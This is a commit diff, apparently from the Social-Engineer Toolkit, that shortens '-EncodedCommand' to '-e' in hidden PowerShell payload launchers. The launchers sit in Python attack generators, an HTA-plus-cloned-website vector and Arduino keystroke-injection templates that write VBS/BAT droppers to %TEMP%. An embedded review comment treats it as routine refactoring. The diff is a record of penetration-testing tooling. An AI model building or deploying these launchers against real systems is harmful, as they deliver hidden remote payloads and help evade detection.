convert encodedcommand to -e abbreviated

TrustedSec 2016-10-13 23:13:53 -04:00
parent c27dee6ea0
commit 0ff64fcae0
7 changed files with 12 additions and 6 deletions


@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 7.4.1
~~~~~~~~~~~~~~~~
* converted all powershell encodedcommand to abbreviated
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.4 version 7.4
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~


@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = file(core.setdir + "x86.powershell").read().rstrip() x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read() # x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
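Review bot: The new command prefix `"powershell -nop -window hidden -noni -e "` is written out by hand on the changed line of this hunk and again, with only cosmetic differences, in the `try:` hunk at -86, the `powershell_menu_choice` hunk at -57, the `gen_hta_cool_stuff` hunk (which also drops `-nop -noni`) and the two Arduino template hunks in `loop()` and `setup()`; for the Python call sites one shared constant (for example on `core`, which the first three already reference) would keep the flag set in a single place the next time it changes. Since `-e` no longer says what it stands for, the switch also deserves a comment where the string is built, e.g. `# -e is powershell.exe's documented short alias for -EncodedCommand`. As far as I recall powershell.exe lists `-e` and `-ec` as aliases of `-EncodedCommand`, but that should be confirmed against the oldest PowerShell version this toolkit targets before relying on it everywhere. `deploy_hex2binary` starts before this hunk and continues after it.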


@ -86,7 +86,7 @@ try:
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: #with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
# x86 = fileopen.read() # x86 = fileopen.read()
x86 = open(core.setdir + "x86.powershell", "r").read() x86 = open(core.setdir + "x86.powershell", "r").read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)


@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
# here we format everything for us # here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen: with open(core.setdir + "/x86.powershell") as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86 x86 = "powershell -nop -window hidden -noni -e " + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)


@ -373,7 +373,7 @@ void loop()
// run through cmd // run through cmd
CommandAtRunBar("cmd"); CommandAtRunBar("cmd");
delay(1000); delay(1000);
Keyboard.println("powershell -EncodedCommand {powershell_command}"); Keyboard.println("powershell -e {powershell_command}");
delay(4000); delay(4000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}"); Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}"); Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");


@ -174,7 +174,7 @@ void setup()
// run through cmd // run through cmd
CommandAtRunBar("cmd"); CommandAtRunBar("cmd");
delay(1000); delay(1000);
Keyboard.println("powershell -EncodedCommand {powershell_command}"); Keyboard.println("powershell -e {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell. // Tweak this delay. Larger files take longer to decode through powershell.
delay(10000); delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}"); Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");


@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...") "Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload( ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86") selection, ipaddr, port, "x86")
command = ("powershell -window hidden -EncodedCommand " + ps) command = ("powershell -window hidden -e " + ps)
# hta code here # hta code here
print_status("Embedding HTA attack vector and PowerShell injection...") print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website # grab cloned website